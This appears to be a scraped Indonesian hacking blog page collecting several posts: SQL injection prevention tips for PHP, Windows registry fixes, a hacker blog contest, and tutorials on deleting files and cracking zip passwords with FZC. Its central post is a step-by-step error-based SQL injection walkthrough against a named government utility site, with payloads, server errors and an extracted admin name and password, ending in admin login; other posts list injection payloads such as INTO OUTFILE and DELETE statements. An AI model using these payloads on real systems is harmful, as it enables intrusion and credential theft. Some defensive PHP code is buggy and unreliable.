5
Algoritma dan teknik menangkal SQL injection

.
Tidak dipungkiri lagi, SQL injection adalah salah satu teknik hacking yg sangat berbahaya. Jika diamati, SQL injection berawal dari satu hal yg sebenarnya sangat sederhana sekali. Kali ini kita akan membahas teknik dan algoritma menangkal SQL injection yg dilakukan melalui methode $_GET.

Tulisan ini diawali kepada kesadaran bahwa atas banyaknya kasus SQL injection. Disamping sedikitnya kesadaran dari programmer dan kebingungan programmer untuk membenahi skripnya. Dikarenakan sedikitnya resource yg membahas bagaimana mencegah SQL injection. Sementara tips dan trik untuk melakukannya sangat banyak.

Mari kita lihat bersama: http://target.com/berita.php?task=detail&id=9

Pada kebanyakan aplikasi yg dibuat oleh programmer pemula, kode program pada berita.php adalah sebagai berikut


require_once(”connection.php”);

$sql = “SELECT * FROM berita WHERE id=”.$_GET['id'];

$result = mysql_query($sql);

while($data = mysql_fetch_array()){

echo “

”.$data['judul'].”

”;

echo “Posting pada tanggal: “.$data['tanggal_posting'];

echo $data['isi'];

}

?>

Coba kita lihat lagi, betapa programmer, entah karena ketidak tahuan atau malas membenahi(nah ini yg susah) tidak memberikan filter pada input $_GET['id']. Padahal ini sangat berbahaya jika attacker mencoba melakukan teknik ini.

Disana ada 2 kesalahan fatal.

1. Tidak memberikan filter atas variable $_GET['id']. Sehingga MySQL Server akan memberikan signal kesalahan ke browser(Jika pada PHP error_message=ON).

2. Tidak melakukan checking terhadap hasil dari Query.

Lantas, bagaimana cara penanggulangannya. Cara mudahnya kita modifikasi skrip diatas seperti berikut ini:


require_once(”connection.php”);

// –> validasi $_GET['id']

if(!ctype_digit($_GET['id'])){

die(””);

}

$sql = “SELECT * FROM berita WHERE id=”.$_GET['id'];

$result = mysql_query($sql);

// –> validasi hasil query

if(mysql_num_rows($result)<0){

while($data = mysql_fetch_array()){

echo “

”.$data['judul'].”

”;

echo “Posting pada tanggal: “.$data['tanggal_posting'];

echo $data['isi'];

}

} else { echo “Berita tidak ditemukan.”; }

?>

Nah, skrip diatas kira-kira mempunyai arti algoritma seperti ini:

1. Pertama-tama, validasi $_GET['id'], jika ia bernilai Integer(angka), maka lanjutkan. Jika tidak, tampilkan peringatan “Jangan coba-coba ya.” dan kembali kehalaman selanjutnya.

2. Lakukan Query

3. Cek hasil query. Jika hasil lebih besar dari 0(1,2,dst), ambil hasil query dan tampilkan ke layar browser. Jika tidak tampilkan pesan “Berita tidak ditemukan.”.

Catatan: algoritma ini bisa dipakai tidak hanya pada PHP saja, tetapi bisa untuk bahasa pemrograman web yg lain. Tentu saja dengan syntax masing-masing. Untuk database selain MySQL tinggal mencari fungsi yg sama atau setara dengan fungsi-fungsi MySQL.

Source: srandal.com


Bookmark and Share


2
Cara mencegah SQL Injection

.
SQL Injection adalah salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server. Pada dasarnya,serangan ini difasilitasi oleh kode program anda sendiri. teknik nya,penyerang mencoba memasukkan query (melalui field atau URL) yang akan menyebabkan database server men-generate query SQL yang tidak valid.

Pada kenyataan nya,SQL injection terbukti merupakan salah satu teknik terbaik yang sering melumpuhkan sasarannya. Begitu penyerang berhasil menguasai kendali dataase server,ia bisa melakukan apa saja,seperti memodifikasi atau bahkan menghapus semua data yang ada. bagaimana pun juga, ini bisa dicegah jika kode program anda melakukan validasi yang baik.

Sebenarnya apa bila anda teliti,teknik SQL injection sangat sederhana sekali. Akan tetapi justru yang sering diabaikan oleh para programer,entah itu tidak tahu atau lupa.

Berikut ini beberapa contoh teknik SQL injection,implementasi,dan cara menggagalkan nya.

Single SQL Injection
walaupun penyerang awalnya mencoba memasukan query berupa pernyataan SQL,akan tetapi bukan sembarang query. Dalam hal ini,penyerang cukup memiliki pengatahuan mengenai SQL,sebagai contoh permulaan (maklumlah saya masih newbie :P) anda memiliki kode seperti ini.

$match = false;
if (isset($_POST['submit'])) {
$nama = $_POST['nama'];
$pass = $_POST['pass'];
$sql = "SELECT nama, password FROM user WHERE
nama='$nama' AND password='$pass'";
$res = mysqli_query($db, $sql);
// jika res berhasil,dan row yang
// dikembalikan=1, set $match=true
if ($res && mysqli_query_rows($res) == 1) {
$match = true ;
mysqli_free_result($res);
}
if ($match === true) {
echo 'account match';
} else {
echo 'invalid account';
}
}


kode program diatas memang kelihatan melakukan verifikasi data, tetapi sebenarnya sangat rapuh,penyerang bisa menggnakan query-query seperti dibawah ini,untuk melakukan akses secara tidak sah

// mengisi field nama saja,# adalah komentar,
// yang akan mengabaikan baris setelahnya
admin'#

// mengisi nama field saja
// mengekstrak data kelokasi tertentu
'OR' 1=1 INTO DUMPFILE '/path/ke_lokasi/file.txt '#
'OR' 1=1 INTO OUTFILE '/path/ke_lokasi/file.txt '#

Bagaimapun juga,contoh contoh SQL injection diatas adalah contoh yang umum. Adapun untuk mencegah nya menggunakan fungsi mysql_real_escape_string () atau addslashes(), seperti yang diuraikan pada fungsi myMacig()sebelumnya

$nama = myMacig($_POST['nama']};
$pass = myMacig($_POST['pass']};


Multiple SQL injection
Contoh SQL injection lainnya adalah dengan memberikan multiple query,seperti berikut:
// $id dari method GET/POST
$sql = "SELECT * FROM buku WHERE kode='{$id}’ “;
//mengahapus isi table
0; DELETE FROM user
// membuat account baru
0; GRANT ALL ON *.* TO 'xxx@%'
Dalam kasus ini,macig quote akan mengabaikan tanda titik koma,ini sangat membahayakan
jika menggunakan SQLite atau postgreSQL. Adapun solusi nya adalah menggunakan operator casting untuk memastikan bahwa id harus integer.

//Simulasi nilai $_POST['id']
0; DELETE FROM user
$id = (int) myMacig($_POST['id']);

apabila anda ingin memeriksa apakah input mengandung karakter tertentu,gunakan fungsi strpos().

$nama = myMacig ($_POST ['id']);
// periksa apakah karakter ; terdapat
// di variabel $nama.
if (strpos($nama, ';' die ('Naughty Naughty,
Very Naughty...');


Bookmark and Share


1
SQL Injection

.
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba

Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.


******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.


Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )


Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)


Bookmark and Share


10
Mengembalikan “Folder Option” yang hilang

.
Virus-virus zaman sekarang memang makin ganas, selain itu makin bervariasi dan tingkat penyebarannya pun semakin mudah aja. Satu kali anda salah klik, maka komputer Anda pun terinfeksi. Salah satu yang sering dilakukan sang virus adalah menghilangkan “Folder Option” di menu Tools pada Explorer anda, sehingga salah satu akibatnya anda tidak bisa merubah option untuk view/ show hidden file, hingga akhirnya anda tidak bisa mengakses folder yang anda hidden

Nah bila anda mengalami seperti ini, “Folder Option” anda hilang cobalah satu dari dua langkah berikut ini :

Langkah Satu :

Klik menu Start > Run

Ketik : “gpedit.msc” tanpa tanda kutip untuk membuka Group Policy Windows

Setelah itu masuk ke :User Configuration >Administrative Templates >Windows Component > Windows Explorer.

Di Panel sebelah kanan, carilah “Remove the Folder Option menu item from the Tools Menu” kemudian double klik dan set value ke “Disabled”



Langkah Dua :

Bukan Registry Editor dengan mengetikan “Regedit” pada menu Run

Kemudian carilah key berikut : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

dan pada panel sebelah kanan cari : NoFolderOptions dan set value menjadi 0

jika anda tidak menemukan NoFolderOptions, tinggal anda buat sendiri dan masukkan valuenya dengan 0.


Bookmark and Share


6
Regedit Disable by Administrator

.
Saat kita akan mengedit registri, ada kalanya fungsi regedit di Windows tidak bisa diakses alias disable. Ini bisa dikarenakan oleh virus, atau juga memang oleh sang Administrator telah di-disable untuk mencegah orang yang tidak berkepentingan mengutak-atik setting Windows. Kalau anda pernah mengalami kejadian seperti ini Registry Editing has been disable by your Administrator ketika memasukkan perintah REGEDIT pada menu RUN
solusi mengatasi registri disable by administrator


Inilah solusi singkat yang mungkin bisa membantu anda mengatasi masalah seperti diatas.

Klik Menu [Start] – [RUN] dan masukkan perintah : GPEdit.msc
GPEDIT



Akan muncul Windows Group Policy, selanjutnya arahkan ke [User Configuration] – [Administrative Templates] – [System].
Group Policy




Setelah itu pada jendela sebelah kanan (panel setting) Double Klik Prevent Access to Registry Editing Tools
disable registry tools



Pada jendela yang muncul pilih NOT CONFIGURED atau DISABLED, untuk mengaktifkan kembali fungsi regedit.
Disable Regedit

Klik OK

Sekarang coba anda akses registry editor lewat menu [RUN] - REGEDIT kalau masih belum berhasil, Restart Komputer anda dan coba akses lagi registry editor.

Bila ternyata Solusi tersebut masih juga kurang ampuh, Tinggal Download REGTOOLS dari Doug Knox, Save dan kemudian jalankan regtools, ini berfungsi untuk meng-enable dan disable registry. Bila kondisi registry editor disable, maka regtool akan meng-enable-kannya, begitupun sebaliknya.

Selamat mencoba dan jangan lupa untuk mendapatkan update dan informasi terbaru dari tasikisme.com secara langsung ke email, tinggal masukkan email anda di bawah ini dan klik subscribe!


Bookmark and Share


3
Lomba Blog dan Posting Forum Muslimhackers.net

.
Lomba Blog Muslimhackes.net

Tema Lomba Blog:
“Hacker Bukan Cracker”

Latar Belakang:
Menurut Wikipedia, hacker adalah seseorang yang mendalami komputer secara mendetail. Tetapi seiring berjalannya waktu, istilah “hacker” sering disamakan cracker. Hal itu membuat pandangan masyarakat terhadap hacker menjadi negatif.

Tujuan:
1. Memberikan pengertian sebenarnya tentang hacker kepada masyarakat.
2. Memperkenalkan situs http://muslimhackers.net .

Ketentuan Peserta:
1. Lomba terbuka untuk seluruh Warga Negara Indonesia.
2. Blog yang didaftarkan adalah blog milik sendiri / bukan milik orang lain
3. Memasang banner Lomba Blog Muslim Hackers pada sidebar blog.
4. Mendaftarkan blog sebelum waktu pendaftaran selesai.
5. Blog berbahasa Indonesia atau English.
6. Terdapat minimal 1 artikel lain (bukan merupakan artikel yang dilombakan) yang berkaitan dengan Islam dan atau IT pada blog.

Peraturan:
1. Membuat tulisan yang berhubungan dengan tema dengan disertai review singkat tentang situs Muslim Hackers..
2. Tulisan merupakan karya sendiri bukan hasil karya orang lain.
3. Tulisan ditampilkan di dalam blog masing-masing peserta.
4. Memasang link ke situs Muslim Hackers (http://www.muslimhackers.net) pada postingan blog.
5. Mendaftarkan blog ke http://blog.muslimhackers.net/lomba sebelum pendaftaran ditutup.
8. Tiap peserta boleh mengirimkan lebih dari satu tulisan.
9. Batas waktu untuk melakukan publikasi tulisan adalah 5 September 2010.

Banner Lomba:
Banner berikut harus dipasang di sidebar blog masing-masing peserta lomba.

Masukkan script di bawah ini ke dalam sidebar blog anda.

Link Yang di pasang





Copy kode di bawah masukan di blog anda,





Penilaian:
1. Penilaian dilakukan oleh juri dari Muslim Hackers.
2. Kriteria penilaian:
a. Popularitas blog.
b. Kualitas tulisan yang dilombakan.
c. Keaslian tulisan.
d. Posisi blog di Search Engine Google dengan kata kunci “Hacker Bukan Cracker”.
e. Tulisan lain yang ada di dalam blog.
3. Daftar pemenang akan diumumkan di http://blog.muslimhackers.net pada 10 September 2010.
4. Keputusan juri tidak dapat diganggu gugat.

Hadiah Lomba Blog:
Juara I: USB Flashdisk 8GB + Kaos Muslim Hackers
Juara II: USB Flashdisk 8GB

———————————————————

Lomba Posting Forum Muslimhackers.net

Ketentuan Peserta Lomba Posting Forum:
1. Lomba terbuka untuk seluruh Warga Negara Indonesia.
2. Peserta terdaftar sebagai member Forum Muslim Hackers.
3. Bagi calon peserta yang belum menjadi member bisa mendaftarkan diri di http://forums.muslimhackers.net
4. Setiap member forum Muslim Hackers otomatis menjadi peserta kecuali pengurus forum.

Peraturan Lomba Posting Forum:
1. Peserta membuat thread/topik pada forum dan memposting tulisan yang berisi share pengetahuan/informasi tentang Islam dan IT sesuai dengan subforum yang ada pada http://forums.muslimhackers.net.
2. Isi postingan bisa berupa tulisan saduran dari orang lain dengan tetap mencantumkan sumber asli tulisan.
3. Tidak diperbolehkan memposting tulisan yang memuat hal-hal ilegal (misal: link download aplikasi bajakan/warez, bagi-bagi kartu kredit, akun premium, trik mengakali sebuah sistem untuk mendapatkan keuntungan secara ilegal, dan sebagainya).
4. Khusus untuk subforum perkenalan hanya diperbolehkan membuat satu thread/topik.
5. Reply/balasan yang berupa junk/sampah (misal: “terima kasih infonya”, “ijin download”, “bagus” dan sebagainya) tidak dimasukkan dalam penjurian.
6. Thread/Topik yang isinya berupa pertanyaan tidak dimasukkan dalam penjurian.
7. Peserta yang melakukan posting junk/menyampah akan dikurangi nilainya.

Penilaian Lomba Posting Forum:
1. Penilaian dilakukan oleh juri dari Muslim Hackers.
2. Kriteria penilaian:
a. Banyaknya thread/topik.
b. Kualitas postingan.
c. Banyaknya balasan/reply yang berkualitas dari member lain pada thread/topik yang dibuat.
3. Daftar pemenang akan diumumkan di http://blog.muslimhackers.net pada 10 September 2010.
4. Keputusan juri tidak dapat diganggu gugat.

Hadiah Lomba Posting Forum:
Juara I: USB Flashdisk 8GB


Bookmark and Share


1
Delete An "undeletable" File

.
Open a Command Prompt window and leave it open.
Close all open programs.
Click Start, Run and enter TASKMGR.EXE
Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.

Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in. At the command prompt type DEL where is the file you wish to delete. Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell. Close Task Manager.

Or you can try this

Open Notepad.exe

Click File>Save As..>

locate the folder where ur undeletable file is

Choose 'All files' from the file type box

click once on the file u wanna delete so its name appears in the 'filename' box

put a " at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)

click save,

It should ask u to overwrite the existing file, choose yes and u can delete it as normal


Here's a manual way of doing it. I'll take this off once you put into your first post zain.

1. Start
2. Run
3. Type: command
4. To move into a directory type: cd c:\*** (The stars stand for your folder)
5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.
7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

Source: 1001 Hacking

Bookmark and Share



0
Create One-Click Shutdown and Reboot Shortcuts

.
First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.

But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:

shutdown -r -t 01 -c "Rebooting your PC"
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message "Rebooting your PC." The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.

I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:

shutdown -s -t 03 -c "Bye Bye m8!"
shutdown -r -t 03 -c "Ill be back m8 ;)!"

Switch
What it does

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f
Forces any running applications to shut down.

-r
Reboots the PC.

Source: 1001 Hacking

Bookmark and Share



3
Cracking Zip Password Files

.
Tut On Cracking Zip Password Files..
What is FZC? FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you're gonna need a password to open the zip file and extract files out of it). You can get it anywhere - just use a search engine such as altavista.com.
FZC uses multiple methods of cracking - bruteforce (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks. Instead of just guessing passwords systematically, the program takes passwords out of a "wordlist", which is a text file that contains possible passwords. You can get lots of wordlists at www.theargon.com.).

FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you're not supposed to have. So like every tool, this one can be used for good and for evil.
The first thing I want to say is that reading this tutorial... is the easy way to learn how to use this program, but after reading this part of how to use the FZC you should go and check the texts that come with that program and read them all. You are also going to see the phrase "check name.txt" often in this text. These files should be in FZC's directory. They contain more information about FZC.

FZC is a good password recovery tool, because it's very fast and also support resuming so you don't have to keep the computer turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or undercase letter or a symbol such as ! or &) because 32 chars is the maximum value that FZC will accept, but it doesn't really matter, because in order to bruteforce a password with 32 chars you'll need to be at least immortal..heehhe.. to see the time that FZC takes with bruteforce just open the Bforce.txt file, which contains such information.
FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don't require you to have anything, wordlist attacks require you to have wordlists, which you can get from www.theargon.com. There are wordlists in various languages, various topics or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password.

Now that you have a good wordlist, just get FZC working on the locked zip file, grab a drink, lie down and wait... and wait... and wait...and have good thoughts like "In wordlist mode I'm gonna get the password in minutes" or something like this... you start doing all this and remember "Hey this guy started with all this bullshit and didn't say how I can start a wordlist attack!..." So please wait just a little more, read this tutorial 'till the end and you can do all this "bullshit".

We need to keep in mind that are some people might choose some really weird passwords (for example: 'e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack (unless you have some weird wordlist). If you have a bad luck and you got such a file, having a 200MB list won't help you anymore. Instead, you'll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won't get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB's list and start using the Brute Force attack.
If you have some sort of a really fast and new computer and you're afraid that you won't be able to use your computer's power to the fullest because the zip cracker doesn't support this kind of technology, it's your lucky day! FZC has multiple settings for all sorts of hardware, and will automatically select the best method.

Now that we've gone through all the theoretical stuff, let's get to the actual commands.
===========
Bruteforce
===========

The command line you'll need to use for using brute force is:

fzc -mb -nzFile.zip -lChr Lenght -cType of chars

Now if you read the bforce.txt that comes with fzc you'll find the description of how works Chr Lenght and the Type of chars, but hey, I'm gonna explain this too. Why not, right?... (but remember look at the bforce.txt too)

For Chr Lenght you can use 4 kind of switches...

-> You can use range -> 4-6 :it would brute force from 4 Chr passwors to 6 chr passwords
-> You can use just one lenght -> 5 :it would just brute force using passwords with 5 chars
-> You can use also the all number -> 0 :it would start brute forcing from passwords with lenght 0 to lenght 32, even if you are crazy i don't think that you would do this.... if you are thinking in doing this get a live...
-> You can use the + sign with a number -> 3+ :in this case it would brute force from passwords with lenght 3 to passwords with 32 chars of lenght, almost like the last option...

For the Type of chars we have 5 switches they are:

-> a for using lowercase letters
-> A for using uppercase letters
-> ! for using simbols (check the Bforce.txt if you want to see what simbols)
-> s for using space
-> 1 for using numbers


Example:
If you want to find a password with lowercase and numbers by brute force you would just do something like:

fzc -mb -nzTest.zip -l4-7 -ca1

This would try all combinations from passwords with 4 chars of lenght till 7 chars, but just using numbers and lowercase.

*****
hint
*****

You should never start the first brute force attack to a file using all the chars switches, first just try lowercase, then uppercase, then uppercase with number then lowercase with numbers, just do like this because you can get lucky and find the password much faster, if this doesn't work just prepare your brain and start with a brute force that would take a lot of time. With a combination like lowercase, uppercase, special chars and numbers.

------------
Wordlis
------------
Like I said in the bottom and like you should be thinking now, the wordlist is the most powerfull mode in this program. Using this mode, you can choose between 3 modes, where each one do some changes to the text that is in the wordlist, I'm not going to say what each mode does to the words, for knowing that just check the file wlist.txt, the only thing I'm going to tell you is that the best mode to get passwords is mode 3, but it takes longer time too.
To start a wordlist attak you'll do something like.

fzc -mwMode number -nzFile.zip -nwWordlist

Where:

Mode number is 1, 2 or 3 just check wlist.txt to see the changes in each mode.
File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn't in the same directory of FZC you'll need to give the all path.

You can add other switches to that line like -fLine where you define in which line will FZC start reading, and the -lChar Length where it will just be read the words in that char length, the switche works like in bruteforce mode.
So if you something like

fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+

FZC would just start reading at line 50 and would just read with length >= to 9.

Example:

If you want to crack a file called myfile.zip using the "theargonlistserver1.txt" wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do:

fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50

-----------
Resuming
-----------

Other good feature in FZC is that FZC supports resuming. If you need to shutdown your computer and FZC is running you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack the current status will be saved in a file called resume.fzc but if you are using a wordlist it will say to you in what line it ended (you can find the line in the file fzc.log too).
To resume the bruteforce attack you just need to do:

fzc -mr

And the bruteforce attack will start from the place where it stopped when you pressed the ESC key.
